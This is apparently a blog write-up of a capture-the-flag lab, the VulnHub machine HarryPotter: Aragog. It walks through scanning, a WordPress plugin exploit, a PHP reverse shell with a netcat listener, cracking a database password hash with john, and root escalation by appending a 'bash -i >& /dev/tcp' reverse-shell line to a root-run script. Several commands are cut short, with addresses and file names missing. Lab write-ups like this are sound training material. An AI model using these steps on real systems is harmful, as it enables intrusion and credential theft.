VulnHub: HarryPotter: Aragog

Today we will take a look at Vulnhub: Aragog. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open — open

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Gobuster

Command: gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/blog (Status: 301) [Size: 313] [ →]
/javascript (Status: 301) [Size: 319] [ →]

  • Wordpress


  • Wpscan

Command: wpscan — url — enumerate ap — plugins-detection aggressive — plugins-version-detection aggressive

  • Exploit

Command: git clone

Command: pip3 install -r requirements.txt

Command: python3 -u

  • Reverse shell

Let’s use a php file to get the reverse shell. Let’s change and upload the ip address

Now type this on your machine

Command: python3 -m http.server 80

Enter this in the url


Your machine

Command: nc -nvlp 1234


After logging in

Command: script /dev/null -c bash

Command: export TERM=xterm


Command: stty raw -echo ; fg

Command: reset

  • Linpeas

Your machine

Command: python3 -m http.server 80

Target machine

Command: wget

Command: chmod +x

Command: ./

  • Mysql

Command: mysql -u root -h localhost -p

Command: show databases;

Command: use wordpress;

Command: show tables;

Command: select * from wp_users;

  • hagrid98


Command: nano hash

Paste the hash here.

Command: john hash — wordlist=/usr/share/wordlists/rockyou.txt

Created directory: /home/al1z4deh/.john
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123 (?)
1g 0:00:00:00 DONE (2022-05-21 14:22) 2.083g/s 3200p/s 3200c/s 3200C/s teacher..mexico1
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

Command: su hagrid98

  • Root


Command: wget

Command: chmod +x pspy64

Command: ./pspy64

Command: echo “bash -i >& /dev/tcp/ 0>&1” >> /opt/

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Programmatic Views in Swift: Parallax and Scale

Software Engineering Beginner’s Beginner Hacks — The beginning pt.4

Free RaceCraft — Build Race

Free RaceCraft - Build  Race

Payments in Flutter with Razorpay Payment Gateway

Deploying Superfluid Protocol to Avalanche Mainnnet

SignalR(WebSocket) Endpoint - Part I

Internals of image steganography

Getting Zbarlight to work on Windows

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

VulnHub: Hogwarts: Dobby

Host Own Dark Website (.onion) on Linux

Hack android by creating a malicious apk by msfvenom:-

SQL injection & Wordpress Explotiation: Welok, Try Hack Me